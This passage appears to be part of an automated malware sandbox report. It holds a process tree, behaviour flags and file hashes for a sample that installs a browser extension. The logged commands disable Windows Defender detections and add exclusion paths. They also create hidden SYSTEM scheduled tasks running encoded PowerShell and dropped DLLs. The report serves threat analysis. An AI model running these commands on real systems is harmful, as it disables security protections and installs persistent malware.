/d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3912 -
    C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      - Suspicious use of WriteProcessMemory
      PID:4384
      C:\Windows\SysWOW64\reg.exe
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        PID:2040
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
      PID:1720
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
      PID:708
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
      PID:968
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
      PID:4744
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
      PID:3640
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
      PID:4156
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
      PID:876
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
      PID:2092
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
      PID:2464
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
      PID:2848
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
      PID:4472
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
      PID:4724
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
      PID:568
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
      PID:648
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
      PID:1308
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
      PID:3944
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
      PID:2740
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
      PID:3620
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
      PID:2272
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
      PID:1436
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
      PID:1772
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
      PID:488
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
      PID:3100
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
      PID:2100
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
      PID:3816
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
      PID:4364
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
      PID:3836
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1300
    C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
      PID:3212
      C:\Windows\SysWOW64\reg.exe
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32
        PID:1552
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64
      PID:2224
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32
      PID:1612
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64
      PID:2460
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32
      PID:396
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64
      PID:4304
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32
      PID:4160
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64
      PID:2888
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32
      PID:4052
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64
      PID:5024
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32
      PID:2500
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64
      PID:4164
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      PID:1204
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      PID:2280
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      PID:4664
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      PID:3552
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32
      PID:3232
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64
      PID:3848
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32
      PID:4028
    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
      PID:2208
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gqgFhoPUL" /SC once /ST 00:06:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)
    PID:928
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gqgFhoPUL"
    PID:2472
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gqgFhoPUL"
    PID:4700
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 06:25:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe\" UK /bAsite_idbVJ 385118 /S" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:5116
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "ZJggANjsYpCqsGjEe"
    PID:2300
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2204
  C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    PID:576
C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID:480
C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  PID:4016
C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe
  C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\YyQFmUW.exe UK /bAsite_idbVJ 385118 /S
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4920
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"
    PID:3116
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    PID:4748
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      PID:876
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    PID:2092
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      PID:4472
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\IjUmhi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:3320
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\IWUSnIA.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
    PID:2816
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "eGwAoTnpAObQfPU"
    PID:4708
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"
    PID:4808
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\EVKasNC.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
    PID:4852
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\SOeOsXe.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
    PID:1040
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\VCxgmMy.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
    PID:648
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\WVwqAGo.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
    PID:2356
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 06:14:13 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll\",#1 /JQsite_idXyH 385118" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
    PID:3128
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "kkPqOHrufYpxTagPJ"
    PID:2868
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    PID:1052
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      PID:1300
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    PID:1116
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      PID:2252
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"
    PID:2648
C:\Windows\system32\rundll32.EXE
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll",#1 /JQsite_idXyH 385118
  PID:3988
  C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\gxdfbuyn\NkPjBSV.dll",#1 /JQsite_idXyH 385118
    - Blocklisted process makes network request
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    PID:3544
    C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"
      PID:4772
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize 2KB
MD5 f4fa1bf0897301ec528383dbedacc14c
SHA1 b9086efa6b7786c53cd881e66f12c202df8da322
SHA256 f15c1ae8840b424026a378df54222c74bea4ad5996fa6fa2263e0d2d4214fdc4
SHA512 1aeb1b19e3f8dab8f2632bb849e19414303b8b5e70dd64089d498f0977a135b817cf977e3a4c4e6acf20df76ec62f342e180dbc37412c3c4de32cb4d910206a1

Filesize 2KB
MD5 0e9daca9540d7b754f940816fb812c33
SHA1 3049d43ecb4f60febceaf905ef438c48cef72667
SHA256 ad3b57cf8ce197af89ca23f3a9cac7fac1a13040b50a1baefa71b317da49cd89
SHA512 289cb00f66523707221cbdc1216e4506ed9d75218ea03257c41b00e18e05c60c156ac22371e6b4953980056ddb603dd170f0f3941b540ae9d2971c6cae92cea5

Filesize 2KB
MD5 b32e8ea3fc0323cdbeb9f59b46d65489
SHA1 118a9595d5171fb3879000dbe2d8703f95eae450
SHA256 86d2e38cb0231bd0bbe579d5e80b8a49918fd4bffbfc77c433b693c0f86cf6a1
SHA512 4aa562d645a91fd692ba6a8463dc3cd7ca20bbf486c58ac7bf12644265275f945d6b3896a8a270a88719943d6e90dd4c8eeb2d4eb675de6fc93ce16e392ae1c1

Filesize 2KB
MD5 fce3f44f5677bcfab805c75fd178461e
SHA1 f2736f47fe33bee880f3bf1e84f800baf198f75f
SHA256 7a442a7276d5a92d0e801ba7156afa70d3a1f267746d0fa1b62fc9021723747e
SHA512 318287b63195c09bf0f4de33fef66bc0d8890e3011951022434cb8ba828db0df9e2c4a96ea92735fac0aac8f078f1b3b67eb9c21ed3504340b7993626ee0aee2

Filesize 2.0MB
MD5 8d3da8f7eb27ef607d2bcee0504fb4aa
SHA1 367ea894e08a603de70cf368a90bcbbe816cf709
SHA256 0771bf084ad0b5708cfe217fbefc775505e8566221f414c92c1d3c382b8feab2
SHA512 7404f77e0659c33d86b2ce3fe2253847c76e17322a8a66d6f54bf665253c9b29fd8f1b6734f6e731842dc0cc0aa53a912edf0f1eca5665c028256758e49bb042

Filesize 2KB
MD5 8bcf16d39c18920008da668a38a602e6
SHA1 52d510d4bc97b3b7e9b3148f1e2849099048c5aa
SHA256 6d762bcfac44e939c58166e323db14ebdde87db7ed0edc65fe63305d77189496
SHA512 6ffb4b285e380085b5a3aa38071a4cc7d5de83bb1b3958c1b4bb7f0e2c2087d81da7a7690b8d11ebf3c58c2ca95d26b42bf5a037f4171680de91ac1f59dd94c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize 187B
MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize 136B
MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize 150B
MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
